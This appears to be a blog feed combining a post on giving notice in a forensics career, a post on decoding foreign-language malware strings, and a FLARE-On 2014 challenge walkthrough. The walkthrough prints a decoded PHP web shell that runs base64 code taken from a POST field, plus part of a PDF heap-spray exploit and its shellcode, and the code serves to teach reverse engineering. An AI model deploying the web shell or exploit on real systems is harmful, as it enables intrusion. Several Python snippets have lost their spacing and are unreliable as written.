However, all good things do come to an end. The opportunity arose from an old friend to work on the RSA NetWitness team, which I will be doing next week. This is an excellent chance to do my favorite things: incident response, forensics, malware analysis, and threat intel, in a very challenging environment with coworkers I respect as my technical seniors. I was getting too long in the tooth at DCFL, becoming too much a senior person, and wanted to be back in an environment where I'm struggling everyday to keep up.

I missed the incident response work and was reaching a point where my rapid rate of learning was tapering off. I needed a more challenging venue and wanted to be more involved in industry-wide collaboration, and not stuck working in the information vacuum of a SCIF.

Deciding to leave was not easy; it was extremely stressful and nerve wracking. I love my company and their environment, and greatly enjoyed the casework that I was exposed to at DCFL. There will always be that shred of regret when you leave something you love, but new opportunities beckon. Even after parting, I continue to assist my peers at Newberry Group and DCFL; their teams are just that amazing.

Technical Side

Let's discuss some of the efforts and decisions that go into making a move such as this. Some are my personal opinions as to leaving a job, and some are good advice for others to consider.

Communication

First, are you sure you want to quit? Most issues in a disgruntled resignation can be easily resolved simply by communication. If you reach the point where you want to leave your job, talk to someone before you accept any hard offer.

It's definitely worthwhile to interview elsewhere, to see other opportunities and where you stand. This can help you go back to your management to demonstrate what other companies are doing, and what they're paying for talent. In my own recent travels, I encountered a grueling 6-hour on-site technical interview and a 12-hour at-home technical interview. These were especially helpful in pinpointing my weaknesses and strengths, making me realize that there were some jobs I loved but wasn't ready for. Additionally, that these were skills my current job could train me for if I give it a chance.

Is it salary? Or a bad work environment? Those things can likely be solved, but only if they are brought to the attention of management. Many organizations will quickly fork over bonuses and increased salary to keep a star employee around, especially in contract work. Some work environments can be resolved by allowing you to work from home twice a week, shifting your work hours, or moving personnel around. Again, it's only possible if it's communicated.

The best thing you can do is request a meeting and simply say "I'm thinking about leaving, and here are my reasons why."

A few years ago, I was commuting an hour each way for many years. The stress of this was slowly taking a toll on my physical and mental state. I would dread my drive every day, and ended up listing my house for sale to move closer. However, after months I resigned from selling it with a bad market. I raised the issue to my boss: "I just can't do it anymore. I'm stuck, I'm miserable, and I don't see a way out." They saw a way out and offered a creative compromise that allowed me to finally move closer from my job.

I raised an issue, they felt it worth keeping me around, and we worked out a solution together.

Timing

Do you need to quit right now? There are sometimes extenuating circumstances that require that, other times it's your choice. Maintain a good relationship with your employer and clients and monitor the workload. If you leave during a critical incident, or a heavy period of assignments, you place a heavy burden on your coworkers. They may never forget that.



My advice: Tell your boss that you're leaving but that you're worried about what would happen in your wake. Agree to work through a crunch period, or a period for them to retrain another employee, before leaving.

And, most controversially, don't give two weeks notice. That's completely unrealistic in our industry. The current trend in most of the working world is to give zero notice, but that is generally directed to employees with little skill.

The more responsibility you have, the greater your notice should be. And the digital forensics and incident response field is a buyer's market. There are not enough candidates to fill the jobs, and it's extremely likely that a candidate would not be found within two weeks. Additionally, if you are contracted to a client site, your company may face the permanent loss of work or positions if they are unable to back-fill your position quickly after your departure.

If you've been in the industry long enough, you realize just how small it is. I still occasionally interact professionally with people I've worked for over a decade ago. In forensics, your work is based upon your character. The adage of burned bridges is definitely true and will haunt you.

Additionally, the work we do doesn't lend itself to just walking away. If you're in the middle of a large-scale incident response, you need to properly fill in your replacement with the client's details, current state of the operation, and what should be focused upon. Likewise with a criminal or forensic examination, where you may be asked to testify one day (even after you quit). If you walk out too quick, you risk your organization having to redo the entire investigation from scratch which will not make anyone happy.

Four weeks notice should be the standard for our industry, in my opinion. In doubt, in which you should be, have a conversation with your management about what an appropriate time would be. If they prefer to have you leave within the hour, then know that they were looking to get rid of you for awhile... Again, communication is the key.

Brain Dump

Dilbert.com

In your final days, you're finishing up your examinations and preparing for the end. If you're lucky, you'll be placed in a state where you're not given more forensic examinations to perform. However, expect to be working up to the bitter end. 

In a good environment, instead of giving you new and difficult work, management will assign it to others and have you mentor that person through the process. This will afford you time to work on the truly important tasks: information sharing.

The single most important thing to accomplish before leaving is to encompass any knowledge you have for another to use. Each person on a team has their own specializations, and it may be impossible to hire a direct replacement that can perform the same tasks as you. Therefore, being able to identify and document these tasks will help keep your old team performing even in your absence.

YARA rules are one direct way of transferring knowledge. Once you've been in the industry long enough, you acquire a second-sense about malicious indicators; seeing specific domain names, file names, or registry keys will instantly set off a red flag of where you should look next to find indicators of the attack. For example, part of my leaving has me correlating and documenting six years of webshells into YARA rules. It's taking my own personal passion, tying it into a larger effort, and helping future examiners receive instant correlation. Also, it only took 4 hours of concerted effort, so there's not many excuses NOT to do this.

Additionally, if your team has an internal wiki, make sure that everything you've done has been documented in great detail. If you've presented any internal Technical Exchanges make sure that the pages are updated with step-by-step procedures and with the latest software.

Examine any half-written scripts that you've been tinkering with. Spend an hour cleaning them up, documenting them, and adding basic usage text to help others months down the road. There is nothing worse, as a user, than running a script and receiving:

Traceback (most recent call last):
File "Z:\Malware\Scripts\Baskin\AwesomeCoolDecoder.py", line 202, in <module>
filename = sys.argv[1]
IndexError: list index out of range


Identify any key task that you've taken upon yourself and notify others of it. We all have hidden jobs that no one knows about. These could include cleaning up certain network shares, maintaining naming structures in the internal Wiki, escorting visitors through an area, sitting in on an annual meeting, or updating the software available to the team. These are the little things that will cause mass confusion in the weeks ahead, often because no one realized that you were doing the work in the first place, and will be surprised that it's not just magically done Monday morning. This is also one last bit of performance measurement that you can provide to strengthen the bridge for any future professional work.

I admit that this may be viewed as giving up your competitive edge, your job security: disclosing private, technical solutions to coworkers. I would counter with the fact that you are more than just a laundry list of technical items. Your value lies in the ability to function without a list provided from others, to do so quickly and efficiency, and to document your actions for others. In other words, being a technical leader and not a follower. Even if you consider yourself a mere follower, the steps laid here can help mold you to become a leader to those around you.

But wait! There's more!

I received some great feedback and ideas for other items to include here, such as how you would integrate quickly into a new team. There are some great points for me to bring up, which I'll pen to paper soon. I'll also add some new perspective on that when I do start a new team on Monday. So, come back and visit this post again soon; there'll be more :)

Mojibaked Malware: Reading Strings Like Tarot Cards

$
0
0
One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to represent each character. The world has yet to recover from the shock of this great invention and modern programmers cry themselves to sleep while fighting with Unicode strings.

For a malware analyst, this typically comes about while analyzing code that's beyond the standard trojan, which typically contains no output. Analyzing C2 clients (servers in other contexts) and decoy documents require being able to identify the correct code page for strings so that they appear correctly, can be attributed to a language, and can then be translated.

ASCII is the range of bytes from 0-255, which occupy one byte of storage. UTF-8 extends upon this by using single-byte where possible, but also allowing variable-length bytes that are mathematically calculated to determine the correct byte to use. If you see a string of text that looks like ASCII, but then randomly contains unknown characters, it is likely UTF-8, such as:

C:\users\brian\樿鱼\malware.pdb

Code pages, UTF-16, and even UTF-32, provide additional challenges by providing little context to the data involved. However, I hope that by this point in 2013 we don't need to continually harp on what Unicode is...

For most analysts, their exposure to Unicode is being confronted with unknown text, and then trying to figure out how to get it back into its original language. This text, when illegible, is known as mojibake, a Japanese term for "writing that changes". The data is correct, and it does mean something to someone, but the wrong encoding is being applied. This results in text that looks, well... wrong.

Most analysts have gotten into the habit of searching for unknown characters then guessing which code page or encoding to apply until they produce something that looks legible. This does eventually work, but is a clumsy science. We all have our favorites to try: GB2312, Big5, Cyrillic, 8859-2, etc. But, let's just keep this short and sweet and show you a tool that your peers likely already know about but forgot to show you.



Many times unknown data is found directly in the middle of known text, such as:

C:\users\brian\樿鱼\malware.pdb

That small section of unknown data in the middle is mojibake. The problem you'll find is that if this string of text is stored within a binary file, such as an executable, using a tool like 'strings' will miss it. 'strings' will instead return two strings: "C:\users\brian\" and "malware.pdb", completely missing the folder name that's UTF-8 Chinese. 

My preferred method for dealing with these is to simply paste the string into Notepad++. It can natively translate to UTF-8 or various code pages on the fly. Just make sure that you're in ANSI mode when you paste it in.

For graphical applications it's a bit more difficult. Take, for instance, these series of texts from a malware C2 client:


This is mojibake. The standard way that most people get around this issue is to identify the code page from the application, usually by using an application like ExifTool, setting their system to use that language pack as the primary, then rebooting and running the application again. This works, but is cumbersome. Others take VM snapshots of their analysis system in various languages, then just revert to the appropriate language to extract the language strings as needed.

The problem deepens when an application has a mixture of correct strings alongside mojibake strings, such as this program does:


The proper strings are the result of the program containing a String/Dialog resource with appropriate language settings applied. This program, viewed with Cerbero's PEInsider, showed Menus and Dialogs with proper settings applied (2052 - Chinese Simplified):


However, for its string table, the application feature virtually no entries at all. Just a string of "A" and "B".



This provides part of the picture, but doesn't encompass all of the strings we may run across, especially for those created dynamically at runtime.

The preferred way is to use a little-known, but also widely-known, Microsoft tool named AppLocale. AppLocale will run an application in a specific, chosen code page and provide native translation. All that is required is for you to have the appropriate language pack installed, without having to make it the OS's primary language.

However, there are multiple issues with AppLocale. It's a GUI loader that displays the supported languages in their native written format, as shown below, making it impossible to know which is which unless you already know the language.


Good luck with that. Especially when you jump between eight languages in a given week.

AppLocale does allow for command line execution, but requires you to know a specific four-digit code page number. A number that's based on Microsoft's Locale ID that's relatively unknown to outsiders. For instance, with Simplified Chinese, they use Locale ID 0804 instead of the universally known 2052.

To simplify the process, I threw together a quick script over the weekend that provided the full selection of Locale IDs, from which one is selected. It then creates a new option on the right-click context menu for executable files. That's it, nothing major.

The effect is instantaneous though. Edit the script and uncomment the language of your choice, then run the script as an account with administrative access. From there, you can simply right click on any executable and select "Execute with AppLocale". The applications should then show up in their native language without any reboots, like our text below from the earlier C2 client:


Note: If instead of the program running, AppLocale gives you a setup window, then you likely do not have that specified language pack installed.

Software:
Microsoft AppLocale: http://www.microsoft.com/en-us/download/details.aspx?id=13209
RightClick_AppLocale: https://github.com/Rurik/RightClick_AppLocale/blob/master/RCAppLocale.py



Further Fun Reading:
Do You want Coffee with That Mojibakehttp://iphone.sys-con.com/node/44480
Unicode Search of Dirty Data, Or: How I Learned to Stop Worrying and Love Unicode Technical Standard #18  Slide Deck (PDF)  |  White Paper
Russian Post Office fixes mojibake on the flyhttp://en.wikipedia.org/wiki/File:Letter_to_Russia_with_krokozyabry.jpg

A Walkthrough for FLARE RE Challenges

$
0
0


The FireEye Labs Advanced Reverse Engineering (FLARE) challenge was causing a bit of a buzz when it was announced and launched in early July. It read like a recruitment campaign for a new division within FireEye, but still a fun challenge to partake in. The challenge started ... and I was on-site at a client site for the week and forgot all about it. 

Busy under the pressure of releasing the new Dissecting the Hack book, the challenge went to the back of my mind until the 24th of July. I was facing a pretty hard-hitting bit of writer's block and frustration. I agreed to let myself have a break to do the challenge for one week before getting back to my commitments.

After the challenge finished, and answers and methods started floating around, I realized that many of my tactics were completely different from others. I'm sure that's to be expected from this field; many of my methods were from working in an environment without Internet access and without an expert on-call for answers. I'm also fully from a forensics background (hex editors and data structures and file parsers, etc), and work in commercial incident response with RSA, so I'd be sure to tackle problems different from someone who had a pentesting or vuln discovery background.

Although the challenge started in early July, it ran up until 15 September. There was an unspoken moratorium on answers/solutions while the challenge ran, but now that the samples are all freely available from their website, some are coming forth with how they completed them.

This is my story.


Challenge 1


The first challenge started out with downloading an executable from the flare-on.com website. I immediately threw it into IDA and started poking around, only to discover that it was just a dropper for the real challenge :)  I let it do its thing, agreed to a EULA without reading it, and received the first challenge file:

File Name       : Challenge1.exe
File Size : 120,832 bytes
MD5 : 66692c39aab3f8e7979b43f2a31c104f
SHA1 : 5f7d1552383dc9de18758aa29c6b7e21ca172634
Fuzzy : 3072:vaL7nzo5UC2ShGACS3XzXl/ZPYHLy7argeZX:uUUC2SHjpurG
Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744
Compiled Time : Wed Jul 02 19:01:33 2014 UTC
PE Sections (3) : Name Size MD5
.text 118,272 e4c64d5b55603ecef3562099317cad76
.rsrc 1,536 6adbd3818087d9be58766dccc3f5f2bd
.reloc 512 34db3eafce34815286f13c2ea0e2da70
Magic : PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
.NET Version : 2.0.0.0
SignSrch : offset num description [bits.endian.size]
0040df85 2875 libavcodec ff_mjpeg_val_ac_luminance [..162]
0040e05d 2876 libavcodec ff_mjpeg_val_ac_chrominance [..162]


Based on this output from the file, I can see first of all that it was built from .NET 2.0 (based on the mscorlib import). That'll be important later to determine what tool to analyze the file in; IDA Pro is not the most conducive tool for .NET applications.

At this point, let's run it and see what happens:



The image shows some happy little trees and a great, big "DECODE" button. Clicking this button changes the image thusly:



Without any clue of what to do with the challenge, or what I'm actually looking for, I open it up for analysis with Red Gate .NET Reflector.


Typically with static analysis on an unknown file, I start from a main() and work down. The equivalent is see here with InitializeComponent():


Notably, I see the decode button being drawn on the screen with button.text = "DECODE"; and a subroutine applied to this button with button.Click += new EventHandler(this.btnDecode_Click); My clue here is to hunt for this routine, btnDecode_Click, which shows:



Math is a good sign. Looking at this, I see three distinct string encoding routines, each producing their own string variable. The first is a definite byte-by-byte encoding, the second appears to be a byte-swap, and the third is a simple XOR. This final value is then applied to the this.lbl_title.Text.

From here, the easiest route was to simply copy the binary data out (Resources.dat_secret) and replicate the routines in Python:


data="\xA1\xB5\x44\x84\x14\xE4\xA1\xB5\xD4\x70\xB4\x91\xB4\x70\xD4\x91\xE4\xC4\x96\xF4\x54\x84\xB5\xC4\x40\x64\x74\x70\xA4\x64\x44"
printdata
foriindata:
str+=chr(((ord(i)>>4)|(ord(i)<<4)&240)^0x29)
printstr
forjinrange(0,len(str),2):
str2+=str[j+1]+str[j]
printstr2
forkinstr2:
str3+=chr(ord(k)^0x66)
printstr3


This resulted in the output of:

╡Dä¶Σí╡╘p┤æ┤p╘æΣ─û⌠Tä╡─@dtpñdD
3rmahg3rd.b0b.d0ge@flare-on.com
r3amghr3.d0b.b0degf@alero-.noc m

The first round of encoding resulted in an email address. Cool!  I poked around for a bit more and found no additional functionality... so... I email the address? Sent on 24 Jul 14 at 2123:


30 seconds later I receive an automated email with the second challenge. Oh, so that's how these are played :)



Challenge 2


Challenge 2 consisted of a ZIP with an HTML and a PNG image:

Path = C2.zip
Type = zip
Physical Size = 10758

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2014-07-07 22:22:33 ....A 8375 2857 home.html
2014-07-07 21:30:25 D.... 0 0 img
2014-07-07 21:30:47 ....A 9560 7430 img\flare-on.png
------------------- ----- ------------ ------------ ------------------------
17935 10287 2 files, 1 folders

Looking at the HTML found that it was a mirror of the flare-on.com web page with no obvious issues. However, it did reference the PNG:



I try to view the PNG and received an error:



Opening it up in a hex editor (and then a text editor) showed that there was no picture data, just a set of PHP code. I was actually disappointed by this. I was hoping it'd be PHP appended to a PNG to at least confuse the newbies, but this was very apparent.



The PHP code was a basic text obfuscation routine where two arrays were created to build new code. One array contained an alphabet of all possible characters used ($terms) and the second contained the actual sequence of the output data ($order). I copy/pasted the tables into a thrown-together Python script:

terms=["M","Z","]","p","\\","w","f","1","v","<","a","Q","z","","s","m","+","E","D","g","W","\"","q","y","T","V","n","S","X",")","9","C","P","r","&","\'","!","x","G",":","2","~","O","h","u","U","@",";","H","3","F","6","b","L",">","^",",",".","l","$","d","`","%","N","*","[","0","}","J","-","5","_","A","=","{","k","o","7","#","i","I","Y","(","j","/","?","K","c","B","t","R","4","8","e","|"]
code=[59,71,73,13,35,10,20,81,76,10,28,63,12,1,28,11,76,68,50,30,11,24,7,63,45,20,23,68,87,42,24,60,87,63,18,58,87,63,18,58,87,63,
...
...
4,7,91,91,4,37,51,70,21,47,93,8,10,58,82,59,71,71,71,82,59,71,71,29,29,47]

data=''
foriincode:
data+=terms[i]
printdata

Running this produced a second PHP script (carriage returns added for clarity):


$_='aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';
$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));

Looking at the big block of data suggests that it is Base64, just based on its appearance. We see it executed by the obfuscated string of $___ which is a weird mixture of octal and hex bytes. By running that string through an online interpreter, we see that it is simply base64_decode:


First we Base64 decode the small block of data in $__ to receive:

$code=base64_decode($_);eval($code);

No surprises here. Now, the big block of data:

$_=if(isset($_POST["\\97\\49\\49\\68\\x4F\\84\\116\\x68\\97\\x74\\x44\\x4F\\x54\\x6A\\97\\x76\\x61\\x35\\x63\\x72\\97\\x70\\x41\\84\\x66\\x6C\\97\\x72\\x65\\x44\\65\\x53\\72\\111\\110\\68\\79\\84\\99\\x6F\\x6D"]))
{
eval(base64_decode($_POST["\\97\\49\\x31\\68\\x4F\\x54\\116\\104\\x61\\116\\x44\\79\\x54\\106\\97\\118\\97\\53\\x63\\114\\x61\\x70\\65\\84\\102\\x6C\\x61\\114\\101\\x44\\65\\x53\\72\\111\\x6E\\x44\\x4F\\84\\99\\x6F\\x6D"]));
};

At this point, PHP is looking to see if an HTTP POST field holds a value and, if so, evals the Base64 decoded version of it. Like a very simple web shell. One issue is that the online interpreter doesn't like the double slashes, but that's an easy fix. Also, that these aren't octal values but actual ASCII decimal values for characters. Unsure of how to print those easily, I threw together a quick script to decode them:


data=r"\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"

result=''
items=data.split('\\')
foriinitems:
ifi:
ifi[0]=='x':result+=chr(int(i[1:3],16))
else:result+=chr(int(i))
printresult

Running this produced:

a11DOTthatDOTjava5crapATflareDASHonDOTcom (or: a11.that.java5crap@flare-on.com)

This was a pretty easy one that was done in 15 minutes. The email was shot off on 24 July 14 at 2138 and I received #3 immediately after.



Challenge 3


Challenge 3 was of a simple, tiny executable named such_evil:

File Name       : such_evil
File Size : 7,168 bytes
MD5 : f015b845c2f85cd23271bc0babf2e963
SHA1 : f5d527908f363f6b1efad684532bf544a2d077ac
Fuzzy : 96:FcVTXrxJsuqISnUitUlGTw9u6Q0H5TrgCV5E/a/mtVox:F4XMuqIitbAH5TP5kEOox
Import Hash : 50f433a443bc36990996bb4d4dd484aa
Compiled Time : Thu Jan 01 00:00:00 1970 UTC
PE Sections (2) : Name Size MD5
.text 6,144 a75c2e2daad859328d31827f1318efd8
.data 512 f553d080b0d5ee70296bfd5aef252b79
Magic : PE32 executable for MS Windows (console) Intel 80386 32-bit

Running the executable showed an alert error:



Opening it up for static analysis with IDA Pro showed that it wouldn't be possible. There is simply a large routine that writes new shellcode to memory, one byte at a time, and then calls it.




I dumped IDA and switched over to Immunity Debugger. I find its debugger much easier to use than IDA's (the latter of which I'm slowly learning to use).

By following the code, it shows that it begins to write it to memory at EBP-0x201. I went to that memory space, nulled it, and monitored the writing:



Once the data was all written, it simply LEA's EBP-0x201 into EAX, and CALL EAX:



Early on in this new routine, there is a FOR loop that XOR's data by 0x66. It decodes from that point in the shellcode forward through the remainder of the data, with an apparent string appearing at the beginning:

"and so it begins"



Additional text is also seen here: hus\00, hsaurhnopa. In understanding shellcode, these are attempts to push (0x68 "h") a string onto the stack in four-byte segments. And, in the next part of code, we see that's exactly what happened. This string ended up becoming an XOR key for the next round of decoding: "nopasaurus"

After decoding we see another block: "get ready to get nop'ed so damn hard in the paint".  The paint? The pain? The ... I don't know.



More decoding, this time by a hardcoded XOR string of Gl0b (0x624F6C47 in reverse endian). Then an XOR by "omg is it almost over?!?" which results in ... an email address:



However, there's more code! By following the rest, we see the the next block contains the error alert window that was shown at the very beginning.

14 minutes after starting, an email was fired off to such.5h311010101@flare-on.com on 24 July 14 at 2152.



Challenge 4



Things are starting to pick up now. Challenge 4 is a PDF named "APT9001.pdf". Obviously a spoof on the APT1 report, I started to wonder if there was a key in this name. Like it's using Trojan 9002 ... minus one?

File Name       : APT9001.pdf
File Size : 21,284 bytes
MD5 : f2bf6b87b5ab15a1889bddbe0be0903f
SHA1 : 58c93841ee644a5d2f5062bb755c6b9477ec6c0b
Fuzzy : 384:y58K1Qdl6W739kGHQN3kiAJdounFkltXw7iYR4hr3h9ihFjhVJVX5g/zd9Gq:F9gWtHQDyFyC7+d32jHX5y
Magic : PDF document, version 1.5

The file is obviously a PDF, with an older format. For a quick triage I used PDFStreamDumper, a GUI tool or PDF analysis that I often try not to use (it's no PDFubar). It failed to show any data from the PDF. Using the generic encryption brute forcer, the file will open to display some objects, but not the ones we really care about.

Using Didier Steven's pdf-parser showed some items of interest:

brians-mbp:Tools bbaskin$ ./pdf-parser.py  ~/FLARE/4/APT9001.pdf
PDF Comment '%PDF-1.5\r\n'

PDF Comment '%\xea\xbb\xc1\x9c\r\n'

obj 1 0
Type: /Catalog
Referencing: 2 0 R, 3 0 R, 5 0 R

<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 5 0 R

>>



obj 5 0
Type: /Action
Referencing: 6 0 R

<<
/Type /Action
/S /JavaScript
/JS 6 0 R
>>


obj 6 0
Type:
Referencing:
Contains stream

<<
/Length 6170
/Filter '[ \r\n /Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65 ]'

>>



Notably, Object 5 (obj 5 0) is an action page that loads Javascript from object 6 (/JS 6 0 R). So, we divert our attention to object 6 and see that the data is encoded with the routine obfuscated. In each name random characters are replaced with their hex values (#XX) but a visual look shows them as "FlateDecode" and "ASCIIHexDecode".

Targeting this object with pdf-parser dumps a block of JavaScript data that we need to work with:

brians-mbp:Tools bbaskin$ ./pdf-parser.py  ~/FLARE/4/APT9001.pdf -o 6 -f
obj 6 0
Type:
Referencing:
Contains stream

<<
/Length 6170
/Filter '[ \r\n /Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65 ]'
>>

'var HdPN = "";
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4

.. removed for brevity ..

%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";

for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=128;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS+ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length ...
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length-bGtvKT);
while(QCZabMzxQiD.length+bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD+QCZabMzxQiD+Juphd;
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();

This is an ugly block of code (some lines were removed as they conflicted with Blogger formatting). There are a lot of long, randomly named variables, but this is of little consequence. Using Notepad++ I just find/replace all of them get get code that looks like this.

var_VAR2_="";
for(_VAR3_=128;_VAR3_>=0;--_VAR3_)_VAR2_+=unescape("%ub32f%u3791");
_VAR4_=_VAR2_+__CODE__;
_VAR5_=unescape("%ub32f%u3791");
_VAR6_=20;
_VAR7_=_VAR6_+_VAR4_.length
while(_VAR5_.length<_VAR7_)_VAR5_+=_VAR5_;
_VAR8_=_VAR5_.substring(0,_VAR7_);
_VAR9_=_VAR5_.substring(0,_VAR5_.length-_VAR7_);
while(_VAR9_.length+_VAR7_<0x40000)_VAR9_=_VAR9_+_VAR9_+_VAR8_;
_VAR11_=newArray();
for(_VAR3_=0;_VAR3_<100;_VAR3_++)_VAR11_[_VAR3_]=_VAR9_+_VAR4_;
for(_VAR3_=142;_VAR3_>=0;--_VAR3_)_VAR1_+=unescape("%ub550%u0166");
_VAR12_=_VAR1_.length+20
while(_VAR1_.length<_VAR12_)_VAR1_+=_VAR1_;
_VAR13_=_VAR1_.substring(0,_VAR12_);
_VAR10_=_VAR1_.substring(0,_VAR1_.length-_VAR12_);
while(_VAR10_.length+_VAR12_<0x40000)_VAR10_=_VAR10_+_VAR10_+_VAR13_;
_VAR11b_=newArray();

for(_VAR3_=0;_VAR3_<125;_VAR3_++)_VAR11b_[_VAR3_]=_VAR10_+_VAR1_;

Interesting ... but I don't care. This is all exploitation code; it doesn't do anything that we care about. Instead, we should look at the shellcode that is injected alongside the exploit:




var
__CODE__=unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c
...



This is shellcode stored as escaped unicode. Notably, when stored this way, the bytes are swapped. For example, %u72f9 is actually 0xf972. If you attempt to just strip the %u and convert to hex, you'd have to swap every two bytes to get the correct value. Or, just use native JavaScript to do it for you. I did the former to get shellcode that had this:


Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000 F9 72 49 46 25 15 0D 7F 3C 3D 84 E0 2A D6 39 E1 ùrIF% <=„à*Ö9á
...
00000768 1C 03 F3 8B 14 8E 03 D3 52 33 FF 57 68 61 72 79 ó‹ Ž ÓR3ÿWhary
00000784 41 68 4C 69 62 72 68 4C 6F 61 64 54 53 FF D2 68 AhLibrhLoadTSÿÒh
00000800 33 32 01 01 66 89 7C 24 02 68 75 73 65 72 54 FF 32 f‰|$ huserTÿ
00000816 D0 68 6F 78 41 01 8B DF 88 5C 24 03 68 61 67 65 ÐhoxA ‹ßˆ\$ hage
00000832 42 68 4D 65 73 73 54 50 FF 54 24 2C 57 68 44 21 BhMessTPÿT$,WhD!
00000848 21 21 68 4F 57 4E 45 8B DC E8 00 00 00 00 8B 14 !!hOWNE‹Üè ‹
00000864 24 81 72 0B 16 A3 FB 32 68 79 CE BE 32 81 72 17 $ r £û2hyξ2 r
00000880 AE 45 CF 48 68 C1 2B E1 2B 81 72 23 10 36 9F D2 ®EÏHhÁ+á+ r# 6ŸÒ


Just with visual analysis, I see "LoadLibraryA" pop out, as well as "MessageBoxA" and "OWNED!!!".

With this block of shellcode, I use shellcode2exe.py to wrap it into an executable and launch it in Immunity debugger. Notably, in execution, unsequenced DWORDs are XOR to form the parts of an email that is assembled to: wa1ch.d3m.spl01ts@flare-on.com


This one took a good while longer than the previous ones. At 2348, almost two hours later after going down various rabbit holes of the exploit and fixing the PDF and putting my kids to sleep very late, I sent off the email... then promptly went to bed.

Challenge 5


Challenge #5 was waiting in my inbox when I woke up early the next morning, another executable:


File Name       : 5get_it
File Size : 101,376 bytes
MD5 : eb4a4861a5d641402551dcfd6f2a4bfa
SHA1 : d0716637a979d071f4c0e32e80393f3a55652aed
Fuzzy : 1536:eHc4Y6O5rgKXNNMnwughXT4m1pKnm3dBdshDr45oQPPGRPTJT:qYv5M+NMwtTzCWPqh45eRPTJT
Import Hash : a609e70126618238af613915d25abb82
Compiled Time : Thu Jul 03 22:01:47 2014 UTC
PE Sections (4) : Name Size MD5
.text 75,776 744af5711d3ed547a1a607631e9d41ea
.rdata 10,752 2d438c10143d8d363256b109982a281c
.data 9,728 abb223f71d55ef5c6b378cd9d968f5e7
.reloc 4,096 19b1fca9179c9b60507bd0d0dce88d36
Magic : PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
SignSrch : offset num description [bits.endian.size]
1000abca 1299 classical random incrementer 0x343FD 0x269EC3 [32.le.8&]
10016482 2545 anti-debug: IsDebuggerPresent [..17]


Notably, this file was flagged by 'file' as a DLL, but failed all of my peutils DLL scraping routines because:



AttributeError: PE instance has no attribute 'DIRECTORY_ENTRY_EXPORT'


I load it into IDA Pro and start with DLLMain():





